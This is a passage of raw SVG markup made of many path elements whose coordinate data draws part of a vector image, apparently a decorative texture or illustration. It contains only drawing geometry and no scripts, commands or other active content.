d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1